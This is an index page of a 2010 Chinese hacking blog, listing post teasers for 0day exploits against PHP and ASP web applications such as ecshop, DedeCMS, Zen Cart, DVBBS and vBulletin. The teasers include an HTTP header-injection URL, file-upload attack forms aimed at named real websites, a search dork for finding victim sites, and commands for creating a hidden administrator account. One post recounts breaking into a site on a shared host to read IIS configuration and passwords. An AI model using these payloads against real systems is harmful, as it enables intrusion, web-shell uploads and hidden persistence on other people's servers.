影子鹰安全网络-主站技术BLOG

用户登陆

站点日历

7 3 2010 - 9 4 8
日	一	二	三	四	五	六
			1	2	3	4
5	6	7	8	9	10	11
12	13	14	15	16	17	18
19	20	21	22	23	24	25
26	27	28	29	30

站点统计

日志：1320 篇
评论：3702 篇
引用：303812 个
会员：1170 人
留言：172 个
访问：18749343 次
今日：18670 平均：7000
建站：2001-10-10
在线人数： ?

最新评论

日志搜索

友情链接

域名1元加1元送主机

共享技术网络平台
更多友情链接...

其他信息

[全部订阅更新]
[鄂ICP备05002492号]

联系我

旗下域名

www.cn9x.com
www.cnyzy.cn

FEED订阅数一览

EMAIL订阅FEED

[1] [2] [3] [4] [5] [6] [7] [8] [9] [10] ... [80]

显示模式:

默认模式 |

树形模式

使用Adsutil.vbs脚本获取IIS配置信息及账号密码 [ 2010-09-03 08:47:11 | 影子鹰 ]

今晚在搞个黑客站的时候拿下旁站权限，但不能夸到目标站的目录下，眼看目标就在眼前却被最后一道关卡给卡死了。之前也有尝试过pr提权，单asp一执行pr就卡死了。。

无奈之下找了群里龙儿心一起来研究，龙儿心经验不错，到shell上立马就搞定了目标站的路径，获取IIS网站路劲和其他基本信息也是使用一个VBS脚本搞定的，这个在我blog中有一个文章帖出来代码。这里我将就再帖下，并说明用法！

Set ObjService=GetObject("IIS://LocalHost/W3SVC")

阅读全文……

作者：kawen | 分类：黑客攻防 | 评论：0 | 引用：0 | 查看：12

iwebshop0.7.7 0day [ 2010-09-03 08:43:14 | 影子鹰 ]

漏洞出在根目录的auction_list.php,第77行-86行:

/* 浏览记录 */
$getcookie = get_hisgoods_cookie();
$goodshistory = array();

阅读全文……

作者：kawen | 分类：黑客攻防 | 评论：0 | 引用：0 | 查看：13

cookie注射批量拿企业站 [ 2010-09-03 08:42:30 | 影子鹰 ]

直接百度或者google一下

关键字：inurl:CompHonorBig.asp?id 出现了很多站点..百度一下，找到相关网页约35,700篇，用时0.231秒

我们到后面几页随便打开一个 http://www.xzruizhe.com/

阅读全文……

作者：kawen | 分类：黑客攻防 | 评论：0 | 引用：0 | 查看：15

微软全系统建立隐藏账户漏洞 [ 2010-09-03 08:41:51 | 影子鹰 ]

可以通过特殊字符建立隐藏账户.命令行界面下不显示,用户管理面板中显示为空.非$..

可以通过智能ABC输入法中V9里的空白字符建立隐藏帐号,命令行下无法建立,可以先写个批处理,如下:
net user 123 /add
net localgroup administrators /add

阅读全文……

作者：kawen | 分类：黑客攻防 | 评论：0 | 引用：0 | 查看：14

ecshop广告调用页消息头写入暴路 [ 2010-09-01 08:25:11 | 影子鹰 ]

/affiche.php,php5环境提示错误暴露程序路径，php4环境显示写入的信息
charset参数未做严谨过滤导致http消息头截断写入
http://localhost/test/ecshop/affiche.php?act=js&type=3&from=xxx&ad_id=1&charset=GBK%0D%0A%0D%0AHTTP/1.1%20200%20OK%0D%0A%0D%0AContent-Type:%20text/html%0D%0A%0D%0AContent-Length:%2035%0D%0A%0D%0A%3Chtml%3Exxx%3C/html%3E%0D%0A%0D%0A

阅读全文……

作者：kawen | 分类：黑客攻防 | 评论：0 | 引用：0 | 查看：25

动网PHP论坛preview.php代码执行漏洞 [ 2010-09-01 08:24:49 | 影子鹰 ]

动网（DVBBS）PHP论坛preview.php代码执行漏洞

动网（DVBBS）论坛系统是一个采用PHP和MYSQL的数据架构的高性能网站论坛解决方案。

在文件preview.php中：

阅读全文……

作者：kawen | 分类：黑客攻防 | 评论：0 | 引用：0 | 查看：23

zen cart 1.38a 多处漏洞0day [ 2010-08-31 08:24:50 | 影子鹰 ]

<form id="frmUpload" enctype="multipart/form-data" action="http://aus-snowboots.com/editors/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">
Upload a new file:<br>
<input type="file" name="NewFile" size="50"><br>
<input id="btnUpload" type="submit" value="Upload">
</form>

阅读全文……

作者：kawen | 分类：黑客攻防 | 评论：0 | 引用：0 | 查看：24

DedeCmsV5.6 本地包含里的上传漏洞利用 [ 2010-08-28 14:27:36 | 影子鹰 ]

本地包含的利用方法。

<form action=”http://www.ra1nker/plus/carbuyaction.php?dopost=return&action=xxx&code=../../include/dialog/select_soft_post” method=”post” enctype=”multipart/form-data” name=”QuickSearch” id=”QuickSearch”>
<input type=”hidden” name=”newname” value=”1.asa”>
<input type=”file” name=”uploadfile”>

阅读全文……

作者：kawen | 分类：黑客攻防 | 评论：0 | 引用：0 | 查看：37

NetCms 注册上传漏洞 Oday [ 2010-08-26 11:30:51 | 影子鹰 ]

NetCMS网站内容管理系是国内最优秀的网站建设程序,全免费全开源 ,由于发表消息附件未

进行严格过滤，导致可上传任意文件漏洞。

测试利用： 1、进去， /user/login.aspx ，点注册。

阅读全文……

作者：kawen | 分类：黑客攻防 | 评论：0 | 引用：0 | 查看：40

Discuz!漫游插件API本地包含漏洞 [ 2010-08-26 11:30:04 | 影子鹰 ]

Discuz!漫游插件API本地包含漏洞,该插件默认不安装,并且服务默认不开启.

manyou/api/class/MyBase.php

128: function parseRequest() {

阅读全文……

作者：kawen | 分类：黑客攻防 | 评论：0 | 引用：0 | 查看：37

dvbbs php2.0 0day [ 2010-08-24 08:28:50 | 影子鹰 ]

joinvipgroup.php //注入

Copy to clipboard

Code:

阅读全文……

作者：kawen | 分类：黑客攻防 | 评论：0 | 引用：0 | 查看：51

VBbuletin 4.0.4 Multiple Vulnerabilities [ 2010-08-22 09:06:50 | 影子鹰 ]

http://DNSname.com/patch/clientscript/vbulletin-core.js?v=

http://DNSname.com/patch/clientscript/vbulletin-core.js?v=(value)

http://DNSname.com/vb/forumdisplay.php?GLOBALS[]=

阅读全文……

作者：kawen | 分类：黑客攻防 | 评论：0 | 引用：0 | 查看：38

[1] [2] [3] [4] [5] [6] [7] [8] [9] [10] ... [80]